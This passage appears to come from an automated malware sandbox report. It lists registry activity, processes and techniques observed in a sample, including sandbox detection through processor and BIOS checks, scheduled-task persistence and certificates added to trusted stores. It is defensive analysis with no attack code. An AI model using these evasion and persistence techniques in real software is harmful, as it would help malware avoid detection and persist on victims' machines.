\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 DrvInst.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 18346303869.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 18346303869.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 VbK9YfyeRvt8rDnUGnSrmaN1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString VbK9YfyeRvt8rDnUGnSrmaN1.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 qeGMdNFSYbt9qljVPOXfGHbY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString qeGMdNFSYbt9qljVPOXfGHbY.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5644 schtasks.exe 5576 schtasks.exe -
Delays execution with timeout.exe 8 IoCs
pid Process 6952 timeout.exe 7132 timeout.exe 6884 timeout.exe 11168 timeout.exe 10996 timeout.exe 2236 timeout.exe 5584 timeout.exe 1424 timeout.exe -
Enumerates system info in registry 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 6 IoCs
pid Process 4460 taskkill.exe 6140 taskkill.exe 5856 taskkill.exe 5652 taskkill.exe 3784 taskkill.exe 6040 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\multiadblock.com\NumberOf = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpCleanupState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "28" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "111" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{87893E74-7627-4F1A-98D4-D9FFE270B19D}" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "143" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 7892b1d2041fd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\multiadblock.com\ = "143" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\multiadblock.com\ = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\multiadblock.com\NumberOfSub = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = fca3e9e6041fd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\multiadblock.com\Total = "2142" MicrosoftEdgeCP.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda13